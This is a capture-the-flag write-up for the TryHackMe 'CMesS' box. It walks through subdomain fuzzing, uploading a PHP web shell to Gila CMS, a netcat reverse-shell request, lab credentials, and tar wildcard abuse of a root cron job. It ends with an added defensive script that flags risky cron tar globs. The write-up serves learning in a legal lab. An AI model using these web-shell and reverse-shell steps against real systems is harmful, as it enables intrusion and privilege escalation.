THM - CMesS
Can you root this Gila CMS box?
This is a medium rated box, and we already know it runs Gila CMS from the title. Let’s begin.
nmap says we’ve got 22 (SSH) and 80 (HTTP) only; web all the way?
Checking searchsploit before doing much else, we can see there are a couple of different authenticated RCE exploits for different versions of Gila, so presumably we’re going to need some creds.
We can do some gobusting/dirbusting and turn up plenty of links, but nothing very fruitful. Checking the Gila documentation doesn’t help much either.
We can use WFUZZ to fuzz for subdomains, so let’s do that:
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://cmess.thm" -H "Host: FUZZ.cmess.thm" -t 42 --hl 1
Note: this command is NOT optimised - it didn’t filter out bad results. But quickly scanning through it revealed one good result - dev.cmess.thm.
We add dev.cmess.thm to our /etc/hosts and continue.
This is a simple page that exists (essentially) purely for the purpose of giving us credentials. Yes, these CTFs are somewhat contrived.
Once we log in and poke around for a bit, we find we can upload a file. I do shell.phtml with the contents:
Once we’ve got that we can send it a reverse shell command with Burp Suite:
GET /tmp/media_thumb/shell.phtml?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.9.10.123+1234+>/tmp/f HTTP/1.1
On the box
We grabbed the credentials for the SQL login earlier when we were poking around in Gila: root:r0otus3rpassw0rd.
We can log in to SQL:
And with that we grab andre’s hash:
But to make it even easier we can find the password (UQfsdCB7aAP6) for andre in /opt/.password.bak and then we can su andre.
Linpeas points to a cronjob:
root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
This was a new one to me. At first I thought I could replace tar, but cron has its own PATH:
And I can’t write to any of these directories. So now what? Well, there is a class of tar exploits that I wasn’t previously aware of. This site provides an explanation and examples. Here’s what I did:
To be honest, I don’t really understand why this works, but it does. More things to learn.
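A defender-side check for the cron pattern above, added here as an example (not code from the original writeup): it flags crontab lines that hand tar a bare shell glob and prints a rewrite that archives the directory by name, so file names inside it can no longer be expanded into tar's argument list. The sample crontab is constructed; the risky entry is the one from the box.

```shell
#!/bin/sh
# Added example, not code from the original writeup. Flags crontab entries that
# run tar over a bare shell glob (the pattern in the cron job above) and prints
# a hardened rewrite. Exit status 0 = risky entry found (rewrite printed),
# 1 = nothing to report.
cron_tar_wildcard_check() {
    line=$1
    # Only lines that invoke tar and pass a bare "*" as its final argument
    case "$line" in
        *"tar "*" *") ;;
        *) return 1 ;;
    esac
    # Directory the job cd's into before running tar, if any
    dir=$(printf '%s\n' "$line" | sed -n 's/.*cd \([^ ]*\) && .*/\1/p')
    if [ -n "$dir" ]; then
        # Archive the directory by name instead of expanding its contents:
        # the shell no longer globs, so file names in $dir never reach tar's argv
        printf '%s\n' "$line" | sed -e "s|cd $dir && ||" -e "s| \*\$| -C $dir .|"
    else
        # No cd: at least stop GNU tar from parsing option-like file names
        printf '%s\n' "$line" | sed -e 's| \*$| -- *|'
    fi
}

# Constructed sample crontab (the CMesS entry plus a control line)
SAMPLE_CRONTAB='* * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *
0 3 * * * root tar -zcf /tmp/etc_backup.tar.gz -C /etc .'

# Report every risky entry in a crontab passed on stdin
scan_crontab() {
    while IFS= read -r entry; do
        if fixed=$(cron_tar_wildcard_check "$entry"); then
            printf 'RISKY: %s\nFIX:   %s\n' "$entry" "$fixed"
        fi
    done
}

printf '%s\n' "$SAMPLE_CRONTAB" | scan_crontab
```

Run it against /etc/crontab and the files under /etc/cron.d on a host you administer; a line reported as RISKY whose directory is writable by a non-root user is the exact condition the writeup abused.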